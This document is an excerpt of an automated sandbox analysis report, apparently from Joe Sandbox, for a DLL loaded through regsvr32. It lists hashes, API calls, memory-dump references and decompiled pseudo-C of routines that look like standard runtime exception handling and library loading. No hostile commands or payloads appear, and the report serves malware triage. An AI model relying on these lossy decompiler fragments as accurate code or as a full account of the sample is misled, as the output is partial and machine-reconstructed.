                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                  • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                  • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                  • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: GestureInfo$CloseHandle
                                                                                                  • String ID: 8
                                                                                                  • API String ID: 372500805-4194326291
                                                                                                  • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                  • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                  • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                  • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                  • String ID: i
                                                                                                  • API String ID: 3181456275-3865851505
                                                                                                  • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                  • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                  • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                  • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                  • String ID:
                                                                                                  • API String ID: 1917832262-0
                                                                                                  • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                  • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                  • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                  • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 66%
                                                                                                  			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                  				void* __rbx;
                                                                                                  				void* __rdi;
                                                                                                  				void* __rsi;
                                                                                                  				void* __rbp;
                                                                                                  				signed int* _t128;
                                                                                                  				void* _t145;
                                                                                                  				intOrPtr _t146;
                                                                                                  				intOrPtr _t154;
                                                                                                  				void* _t173;
                                                                                                  				intOrPtr _t176;
                                                                                                  				signed int _t177;
                                                                                                  				signed int _t178;
                                                                                                  				void* _t209;
                                                                                                  				signed long long _t219;
                                                                                                  				signed long long _t220;
                                                                                                  				signed long long _t226;
                                                                                                  				long long _t228;
                                                                                                  				signed int _t235;
                                                                                                  				intOrPtr* _t236;
                                                                                                  				intOrPtr* _t237;
                                                                                                  				signed long long _t246;
                                                                                                  				long long _t267;
                                                                                                  				signed int* _t280;
                                                                                                  				long long _t281;
                                                                                                  				void* _t282;
                                                                                                  				void* _t283;
                                                                                                  				signed long long _t284;
                                                                                                  				long long _t296;
                                                                                                  				signed int _t307;
                                                                                                  				unsigned long long _t313;
                                                                                                  
                                                                                                  				_t180 = __esi;
                                                                                                  				_t282 = _t283 - 0x28;
                                                                                                  				_t284 = _t283 - 0x128;
                                                                                                  				_t219 =  *0x80021010; // 0x5388a1408558
                                                                                                  				_t220 = _t219 ^ _t284;
                                                                                                  				 *(_t282 + 0x10) = _t220;
                                                                                                  				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                  				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                  				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                  				_t236 = __rcx;
                                                                                                  				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                  				 *(_t282 - 0x68) = _t307;
                                                                                                  				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                  				_t281 = __r9;
                                                                                                  				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                  				r14d = _t128;
                                                                                                  				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                                  				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                                  				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                                  				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                                  				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                                  				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                  				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                  				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                  				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                                  				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                                  				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                                  				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				E00000001180002D40(_t220);
                                                                                                  				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                  				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                                  				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                                  				goto 0x800037b0;
                                                                                                  				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                  				 *(_t282 - 0x48) = _t280;
                                                                                                  				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                                  				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                                  				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                                  				r15d = 0;
                                                                                                  				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                                  				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                  				 *(_t284 + 0x20) = _t280;
                                                                                                  				r8d = r14d;
                                                                                                  				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                  				asm("movups xmm0, [ebp-0x28]");
                                                                                                  				asm("movdqu [ebp-0x38], xmm0");
                                                                                                  				asm("psrldq xmm0, 0x8");
                                                                                                  				asm("movd eax, xmm0");
                                                                                                  				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                                  				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                  				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                  				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                  				_t146 = r13d;
                                                                                                  				asm("inc ecx");
                                                                                                  				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                  				asm("movd eax, xmm0");
                                                                                                  				asm("movups [ebp-0x60], xmm0");
                                                                                                  				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                                  				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                  				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                                  				r12d = r15d;
                                                                                                  				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                  				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                  				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                  				if (r15d == 0) goto 0x80003658;
                                                                                                  				_t246 = _t226 + _t226 * 4;
                                                                                                  				asm("movups xmm0, [edx+ecx*4]");
                                                                                                  				asm("movups [ebp-0x8], xmm0");
                                                                                                  				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                                  				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                                  				E0000000118000241C(_t226);
                                                                                                  				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                  				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                  				E0000000118000241C(_t228);
                                                                                                  				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                  				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                  				if (_t176 <= 0) goto 0x800035e8;
                                                                                                  				E0000000118000241C(_t228);
                                                                                                  				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                  				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                                  				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                  				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                  				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                  				if (_t154 > 0) goto 0x800035ac;
                                                                                                  				r12d = r12d + 1;
                                                                                                  				if (r12d == r15d) goto 0x8000365f;
                                                                                                  				goto 0x80003565;
                                                                                                  				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                  				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                  				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                  				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                  				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                  				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                  				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                  				 *(_t284 + 0x20) = _t280;
                                                                                                  				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                  				goto 0x80003664;
                                                                                                  				goto 0x80003668;
                                                                                                  				r15d = 0;
                                                                                                  				r13d = r13d + 1;
                                                                                                  				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                                  				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                                  				_t209 = _t280[8] - r15d;
                                                                                                  				if (_t209 == 0) goto 0x8000369e;
                                                                                                  				E00000001180002408(_t282 - 8);
                                                                                                  				if (_t209 != 0) goto 0x800036bf;
                                                                                                  				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                                  				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                                  				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                                  				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                                  				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                                  				_t235 = _t280[8];
                                                                                                  				goto 0x800036e7;
                                                                                                  				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                                  				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                  				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                  				 *(_t284 + 0x50) = _t177;
                                                                                                  				_t178 = _t177 | 0xffffffff;
                                                                                                  				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                  				 *(_t284 + 0x40) = _t313;
                                                                                                  				 *(_t284 + 0x38) = _t178;
                                                                                                  				 *(_t284 + 0x30) = _t178;
                                                                                                  				 *(_t284 + 0x28) = _t280;
                                                                                                  				 *(_t284 + 0x20) = _t313;
                                                                                                  				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                  				goto 0x80003784;
                                                                                                  				if (_t280[3] <= 0) goto 0x80003784;
                                                                                                  				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                                  				 *(_t284 + 0x38) = _t307;
                                                                                                  				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                  				 *(_t284 + 0x28) = r14d;
                                                                                                  				 *(_t284 + 0x20) = _t280;
                                                                                                  				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                  				_t173 = E00000001180002D40(_t235);
                                                                                                  				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                                  				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                  			}

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 849930591-393685449
                                                                                                  • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                  • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                  • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                  • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                  				void* _t35;
                                                                                                  				signed long long _t56;
                                                                                                  				intOrPtr _t60;
                                                                                                  				void* _t71;
                                                                                                  				signed long long _t72;
                                                                                                  				long long _t78;
                                                                                                  				void* _t82;
                                                                                                  				signed long long _t88;
                                                                                                  				signed long long _t89;
                                                                                                  				signed long long _t90;
                                                                                                  				WCHAR* _t91;
                                                                                                  				long _t94;
                                                                                                  				void* _t97;
                                                                                                  				WCHAR* _t102;
                                                                                                  
                                                                                                  				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                  				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                  				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                  				r15d = __ecx;
                                                                                                  				_t72 = _t71 | 0xffffffff;
                                                                                                  				_t89 =  *0x80021010; // 0x5388a1408558
                                                                                                  				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                                  				asm("dec ecx");
                                                                                                  				if (_t88 == _t72) goto 0x8000a51f;
                                                                                                  				if (_t88 == 0) goto 0x8000a441;
                                                                                                  				_t56 = _t88;
                                                                                                  				goto 0x8000a521;
                                                                                                  				if (__r8 == __r9) goto 0x8000a504;
                                                                                                  				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                                  				if (_t60 == 0) goto 0x8000a469;
                                                                                                  				if (_t60 != _t72) goto 0x8000a55e;
                                                                                                  				goto 0x8000a4f0;
                                                                                                  				r8d = 0x800;
                                                                                                  				LoadLibraryExW(_t102, _t97, _t94);
                                                                                                  				if (_t56 != 0) goto 0x8000a53e;
                                                                                                  				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                                  				_t14 = _t56 - 0x50; // -80
                                                                                                  				_t35 = _t14;
                                                                                                  				r8d = _t35;
                                                                                                  				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                  				r8d = _t35;
                                                                                                  				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                  				r8d = 0;
                                                                                                  				LoadLibraryExW(_t91, _t71);
                                                                                                  				if (_t56 != 0) goto 0x8000a53e;
                                                                                                  				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                                  				if (__r8 + 4 != __r9) goto 0x8000a44a;
                                                                                                  				_t90 =  *0x80021010; // 0x5388a1408558
                                                                                                  				asm("dec eax");
                                                                                                  				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                                  				return 0;
                                                                                                  			}


















                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3013587201-537541572
                                                                                                  • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                  • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                  • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                  • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 50%
                                                                                                  			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                  				intOrPtr _t61;
                                                                                                  				intOrPtr _t65;
                                                                                                  				intOrPtr _t67;
                                                                                                  				intOrPtr _t68;
                                                                                                  				struct HINSTANCE__* _t81;
                                                                                                  				long long _t85;
                                                                                                  				void* _t89;
                                                                                                  				struct HINSTANCE__* _t94;
                                                                                                  				long _t97;
                                                                                                  				void* _t100;
                                                                                                  				signed long long _t101;
                                                                                                  				WCHAR* _t104;
                                                                                                  
                                                                                                  				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                  				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                  				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                  				_t101 = _t100 | 0xffffffff;
                                                                                                  				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
                                                                                                  				if (_t61 == _t101) goto 0x800046eb;
                                                                                                  				if (_t61 != 0) goto 0x800046ed;
                                                                                                  				if (__r8 == __r9) goto 0x800046e3;
                                                                                                  				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                                  				if (_t67 == 0) goto 0x8000462e;
                                                                                                  				if (_t67 != _t101) goto 0x800046c5;
                                                                                                  				goto 0x80004699;
                                                                                                  				r8d = 0x800;
                                                                                                  				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                  				_t68 = _t61;
                                                                                                  				if (_t61 != 0) goto 0x800046a5;
                                                                                                  				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                                  				_t14 = _t68 + 7; // 0x7
                                                                                                  				r8d = _t14;
                                                                                                  				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                                  				r8d = 0;
                                                                                                  				LoadLibraryExW(??, ??, ??);
                                                                                                  				if (_t61 != 0) goto 0x800046a5;
                                                                                                  				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                                  				goto 0x8000460c;
                                                                                                  				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                                  				_t65 =  *_t21;
                                                                                                  				 *_t21 = _t61;
                                                                                                  				if (_t65 == 0) goto 0x800046c5;
                                                                                                  				FreeLibrary(_t94);
                                                                                                  				GetProcAddress(_t81);
                                                                                                  				if (_t65 == 0) goto 0x800046e3;
                                                                                                  				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                                  				goto 0x800046ed;
                                                                                                  				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                                  				return 0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                  • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                  • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                  • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                  • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506987500-0
                                                                                                  • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                  • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                  • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                  • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                  • String ID: CONOUT$
                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                  • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                  • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                  • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                  • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                  • SetLastError.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
